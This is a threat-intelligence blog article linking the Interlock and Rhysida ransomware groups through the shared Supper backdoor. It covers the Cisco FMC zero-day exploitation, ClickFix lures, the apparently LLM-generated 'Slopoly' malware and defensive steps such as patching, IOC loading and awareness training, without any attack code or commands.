Photo by Chris Ried on Unsplash
- IBM X-Force linked both Interlock and Rhysida ransomware to the same Supper backdoor (also tracked as SocksShell and WINDYTWIST), first observed in July 2024 — pointing to shared developers or a common criminal service market rather than two fully independent groups.
- By the end of 2025, each group had claimed roughly 80 victims; Rhysida's cumulative total reached 265 confirmed victims as of February 2026, with 133 of them (50.2%) located in the United States.
- Interlock exploited CVE-2026-20131 — a CVSS 10.0 Cisco Secure Firewall Management Center zero-day enabling unauthenticated remote code execution with root privileges — 36 days before Cisco's official March 4, 2026 disclosure.
- IBM X-Force identified "Slopoly" in early 2026, a PowerShell-based C2 framework (command-and-control infrastructure used to remotely direct compromised machines) bearing hallmarks of LLM generation — marking a new threshold in AI-assisted attack development.
The Evidence
16,384. That is the number of simultaneous attack sessions the Supper backdoor can sustain over a single TCP connection — a specification that reveals exactly how much operational scale this tool was engineered to support. When IBM X-Force researchers began pulling apart the malware code used by both Interlock and Rhysida ransomware operations, that figure was one of the telltale technical markers linking the two groups to a common codebase. As reported by CyberSecurityNews, the shared backdoor carries unique 16-bit session IDs and was first detected in the wild in July 2024 — months before Interlock even launched publicly in September 2024.
According to Google News's aggregation of threat intelligence reporting on this incident, the timeline itself is telling. Rhysida has operated as a Ransomware-as-a-Service (RaaS) platform since May 2023 — meaning the group licenses its ransomware infrastructure to affiliated criminal operators in exchange for a share of ransom proceeds. Interlock arrived roughly 15 months later with capabilities that looked suspiciously familiar. Cisco Talos assessed with low confidence that "Interlock ransomware is likely a new diversified group that emerged from Rhysida ransomware operators or developers, based on some similarities in the operators' tactics, techniques, and procedures (TTPs) and in the ransomware encryptor binaries." IBM X-Force offered a more calibrated read: "The overlaps are strong enough to suggest either shared developers, shared code lineage, or a tightly connected criminal service market, but not enough to prove a single unified group."
The shared tooling extends beyond the Supper backdoor itself. CyberSecurityNews's review of IBM X-Force's code analysis found that NodeSnake, the JunkFiction downloader, InterlockRAT, and multiple Supper variants all appear to have grown from the same original codebase. The connection widened further in November 2025, when Gootloader malware campaigns were observed dropping the Supper SOCKS5 backdoor — indicating adoption well beyond Interlock and Rhysida. The emerging picture is less "two rival criminal gangs" and more a functioning criminal supply chain with shared service vendors.
What It Means — and Who Carries the Blast Radius
Shared tooling creates a specific problem for defenders: attribution confusion. When two groups run the same backdoor, incident responders burn precious containment hours trying to identify which threat actor they face rather than isolating the breach. That delay is measurable in data exfiltrated, patients notified, and regulators called.
As of June 16, 2026, the blast radius is already documented and specific. Amazon's threat intelligence teams identified an active Interlock campaign exploiting CVE-2026-20131 in March 2026, targeting education, engineering, manufacturing, healthcare, and government. The vulnerability — a critical flaw in Cisco Secure Firewall Management Center that allows an unauthenticated remote attacker to execute arbitrary commands with root privileges — carries a CVSS severity score of 10.0, the maximum possible. Interlock began exploiting it on January 26, 2026, 36 days before Cisco's official disclosure on March 4, 2026. Federal agencies received a mandatory patch deadline of March 22, 2026 — just 18 days post-disclosure.
Chart: Confirmed victim counts for Rhysida (total and U.S.-only as of February 2026) versus Interlock's claimed count through end of 2025. Sources: IBM X-Force, CISA Advisory AA25-203A.
The DaVita breach from April 2025 provides the clearest data point for what blast radius looks like in a healthcare setting: Interlock exfiltrated 1.5 terabytes of data affecting more than 200,000 patients. Rhysida posted victims on a near-daily basis in late December 2025, with 8 distinct major attacks recorded between January 6 and February 17, 2026 alone. On July 22, 2025, CISA, the FBI, HHS, and MS-ISAC issued joint advisory AA25-203A documenting Interlock's TTPs and indicators of compromise (IOCs — unique digital fingerprints that malware leaves behind) from investigations as recent as June 2025. For organizations in healthcare and government that have not reviewed it, that advisory is the first document to pull.
The Criminal Supply Chain the Headline Buries
My read on the IBM X-Force analysis: this story is less about two ransomware brands competing and more about how the ransomware ecosystem has industrialized. Groups no longer need to build every tool from scratch. A shared backend — private crypter services, initial access brokers, common backdoors like Supper — lets new affiliates stand up sophisticated operations rapidly while simultaneously obscuring attribution. The criminal service market does what legitimate SaaS does: abstracts complexity so operators can focus on deployment.
The ClickFix social engineering tactic used by Interlock as its primary initial access method illustrates this maturity clearly. Threat actors serve fake system alerts and counterfeit CAPTCHA pages to trick end users into opening PowerShell and executing malicious commands manually. No zero-day required for initial entry — just a convincing fake browser error. This technique bypasses traditional endpoint detection because the user, not automated malware, initiates execution. Security awareness training on this single pattern can close the door on Interlock's most common entry vector.
And then there is Slopoly. IBM X-Force identified this PowerShell-based command-and-control framework in early 2026 as likely LLM-generated — evidenced by unusually extensive inline code commentary, structured logging, clearly named variables, and sophisticated error-handling logic that human-written malware rarely bothers to include. Interlock's ability to deploy AI-generated malware that maintained persistent access to compromised servers for more than a week signals that the technical barrier to building functional, well-documented attack tooling has dropped to "know how to write a prompt." This connects to the broader pattern Smart AI Agents covered recently on AI governance: as large language model capabilities become commoditized infrastructure, so does their use by threat actors to accelerate attack development cycles.
How to Act on This — Ship This Control Today
If your organization runs Cisco Secure Firewall Management Center and has not applied the patch disclosed on March 4, 2026, there is an unauthenticated remote code execution hole with a CVSS 10.0 score sitting at your network perimeter. Federal agencies were required to remediate by March 22, 2026. If a government-mandated deadline has already passed your organization by, ship this update to production today. Verify patch status across every Cisco FMC instance — especially any that are not directly internet-facing but reachable through internal pivot paths. Interlock demonstrated it was exploiting this vulnerability 36 days before disclosure, meaning patch lag is the attacker's advantage.
Interlock's most documented initial access method requires no sophisticated exploit — only a user who trusts a fake error message. Deploy DNS-layer filtering or browser isolation (tools such as Cisco Umbrella, Cloudflare Gateway, or comparable platforms) to block domains serving ClickFix lure pages. Complement this with a targeted security awareness session covering one specific pattern: no legitimate software or website will ever instruct a user to open a terminal, copy a command, and run it manually. One focused training session on this single technique — not a thirty-item cybersecurity best practices checklist — addresses the root of Interlock's most common entry point.
Load the indicators of compromise from CISA advisory AA25-203A directly into your SIEM (Security Information and Event Management platform — the system that aggregates logs and generates alerts across your environment) and EDR (Endpoint Detection and Response) tooling. Hunt specifically for Supper's behavioral signature: a single persistent TCP connection carrying an unusually high volume of multiplexed sessions, particularly over non-standard ports. Standard detection rules watching for many simultaneous connections will miss it — the tool is engineered to look like one connection. Organizations in healthcare, education, and government should treat this as a priority threat hunt given both groups' documented and consistent targeting of those sectors. This is an incident response discipline that pays dividends regardless of whether Interlock or Rhysida is the active threat.
Frequently Asked Questions
How does the Supper backdoor work, and why is it difficult to detect on corporate networks?
Supper operates as a SOCKS5 proxy — essentially an encrypted tunnel that routes attacker traffic through a compromised internal machine, making malicious communications appear to originate from inside the network. Its key technical characteristic is multiplexing: it supports up to 16,384 concurrent sessions over a single TCP connection, using unique 16-bit session IDs to track each one. Detection approaches that look for many simultaneous outbound connections will miss it entirely, because from the network's perspective it registers as a single persistent session. Effective detection requires behavioral rules targeting the data volume and pattern flowing through a single long-lived TCP connection on non-standard ports — a detection capability that requires tuning SIEM rules beyond default configurations.
Is Interlock ransomware directly related to Rhysida, or are they independent threat actors sharing tools?
The relationship is documented but contested in its precise nature. Cisco Talos assessed with low confidence that Interlock likely emerged from Rhysida operators or developers, citing overlapping TTPs and similarities in encryptor binaries. IBM X-Force's code-level analysis stopped short of declaring them a unified group, characterizing the overlaps as consistent with shared developers, shared code lineage, or a tightly connected criminal service marketplace. What both assessments agree on: IOCs associated with one group should be treated as actionable indicators for the other. The November 2025 observation of Gootloader campaigns also dropping the Supper backdoor suggests the shared tooling extends beyond just these two groups, pointing to a broader criminal supply chain rather than an exclusive bilateral relationship.
What industries does Interlock ransomware target most, and what does an effective data protection response look like?
As of June 16, 2026, Interlock's confirmed target sectors include healthcare, education, engineering, manufacturing, and government — all characterized by high data sensitivity, regulatory exposure, and historically slower patch deployment cycles. The April 2025 DaVita breach (1.5 terabytes exfiltrated, 200,000-plus patients affected) sets the stakes for healthcare organizations specifically. An effective data protection posture against Interlock requires layering: apply CVE-2026-20131 patches immediately, review all internet-facing firewall management interfaces, deploy ClickFix-specific user awareness training, load AA25-203A IOCs into detection tooling, and confirm that network segmentation prevents a compromised endpoint from reaching backup infrastructure directly. Organizations subject to HIPAA should also review their incident response plans on the assumption that Interlock's default playbook is double-extortion — encrypt the data and threaten to publish it — which means backups alone do not eliminate leverage.
Explore Our Network
Disclaimer: This article is editorial commentary for informational purposes only and does not constitute professional security consulting advice. Threat data and statistics reflect publicly available information at time of writing. Always consult with a qualified cybersecurity professional for your organization's specific needs. Research based on publicly available sources current as of June 16, 2026.
No comments:
Post a Comment